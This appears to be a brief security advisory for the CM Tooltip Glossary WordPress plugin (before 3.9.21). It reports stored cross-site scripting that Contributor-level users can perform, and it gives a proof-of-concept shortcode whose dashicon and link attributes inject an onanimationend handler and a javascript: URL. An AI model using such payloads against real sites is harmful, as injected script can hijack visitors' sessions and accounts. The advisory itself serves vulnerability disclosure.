CM Tooltip Glossary < 3.9.21 - Contributor+ Stored Cross-Site Scripting

The plugin does not escape some glossary_tooltip shortcode attributes, which could allow users a role as low as Contributor to perform Stored Cross-Site Scripting attacks

PoC

[glossary_tooltip dashicon=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//’ link=“javascript:alert(/XSS-enhanced-tooltipglossary_link/)”]Click me[/glossary_tooltip]